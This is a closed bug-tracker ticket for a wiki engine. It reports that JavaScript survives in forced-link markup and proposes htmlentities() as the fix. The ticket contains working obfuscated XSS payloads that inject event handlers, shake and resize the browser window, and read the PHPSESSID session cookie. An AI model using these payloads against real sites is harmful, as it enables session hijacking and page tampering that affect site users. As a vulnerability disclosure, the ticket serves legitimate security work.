Context Navigation

← Previous Ticket
Next Ticket →

Ticket #142 (closed defect: fixed)

Opened 4 years ago

Last modified 2 years ago

Javascript not stripped from forced links

Reported by:	anonymous	Owned by:	unassigned
Priority:	high	Milestone:	1.1.6.2
Component:	core	Version:	1.1.6.1
Severity:	major	Keywords:
Cc:

Description (last modified by DarTar) (diff)

On the sandbox, try the following:

[["id="q" Hello]] [["onmouseover="eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,113,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,70,79,78,84,32,83,84,89,76,69,61,92,34,102,111,110,116,58,110,111,114,109,97,108,32,110,111,114,109,97,108,32,98,111,108,100,32,49,50,56,112,120,32,65,114,105,97,108,59,116,101,120,116,45,100,101,99,111,114,97,116,105,111,110,58,98,108,105,110,107,59,92,34,62,33,33,68,65,78,71,69,82,33,33,60,47,70,79,78,84,62,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,68,73,86,34,41,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,108,97,115,116,67,104,105,108,100,46,105,110,110,101,114,72,84,77,76,61,34,60,70,79,78,84,32,83,84,89,76,69,61,92,34,102,111,110,116,58,110,111,114,109,97,108,32,110,111,114,109,97,108,32,98,111,108,100,32,49,50,56,112,120,32,65,114,105,97,108,59,116,101,120,116,45,100,101,99,111,114,97,116,105,111,110,58,98,108,105,110,107,59,92,34,62,72,79,79,87,69,69,33,33,60,47,70,79,78,84,62,34))" Interesting]] [["onmouseover="eval(String.fromCharCode(119,105,110,100,111,119,46,115,104,97,107,101,61,110,101,119,32,102,117,110,99,116,105,111,110,40,41,123,119,105,110,100,111,119,46,109,111,118,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,114,101,115,105,122,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,115,99,114,111,108,108,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,115,101,116,84,105,109,101,111,117,116,40,34,119,105,110,100,111,119,46,115,104,97,107,101,34,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,49,48,48,41,41,59,125,59,119,105,110,100,111,119,46,115,104,97,107,101,59))" Shake]]

The two below work together to do something annoying [["id="w"title="eval(String.fromCharCode(119,105,110,100,111,119,46,109,111,118,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,114,101,115,105,122,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,115,99,114,111,108,108,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,115,101,116,84,105,109,101,111,117,116,40,34,101,118,97,108,40,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,92,34,119,92,34,41,46,116,105,116,108,101,41,34,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,49,48,48,41,41,59))" Hello]] [["onmouseover="eval(String.fromCharCode(101,118,97,108,40,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,119,34,41,46,116,105,116,108,101,41))" Testing]]

I believe htmlentities() can fix this, as sakaru [at] gmail [dot] com said on the sandbox.

Dependencies

#148

Change History

Changed 4 years ago by anonymous

I just completed the thought by fetching PHPSESSID:

[["onmouseover="eval(String.fromCharCode(118,97,114,32,109,61,34,80,72,80,83,69,83,83,73,68,61,34,59,118,97,114,32,99,61,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,46,115,112,108,105,116,40,39,59,39,41,59,102,111,114,40,118,97,114,32,105,61,48,59,105,60,99,46,108,101,110,103,116,104,59,105,43,43,41,123,118,97,114,32,100,61,99,91,105,93,59,119,104,105,108,101,40,100,46,99,104,97,114,65,116,40,48,41,61,61,39,32,39,41,123,100,61,100,46,115,117,98,115,116,114,105,110,103,40,49,44,100,46,108,101,110,103,116,104,41,59,125,105,102,32,40,100,46,105,110,100,101,120,79,102,40,109,41,32,61,61,32,48,41,123,97,108,101,114,116,40,100,46,115,117,98,115,116,114,105,110,103,40,109,46,108,101,110,103,116,104,44,100,46,108,101,110,103,116,104,41,41,125,59,125))" Try to get cookie]]

It alerts the user of their PHP session id. AJAX and username/password cookies could be interesting as well.

Note: See TracTickets for help on using tickets.

Download in other formats:

Context Navigation

Ticket #142 (closed defect: fixed)

Javascript not stripped from forced links

Description (last modified by DarTar) (diff)

Dependencies

Change History

Changed 4 years ago by anonymous

Changed 4 years ago by DarTar

Changed 4 years ago by DarTar

Changed 4 years ago by anonymous

Changed 4 years ago by DarTar

Changed 4 years ago by DotMG

Changed 3 years ago by JavaWoman

Download in other formats: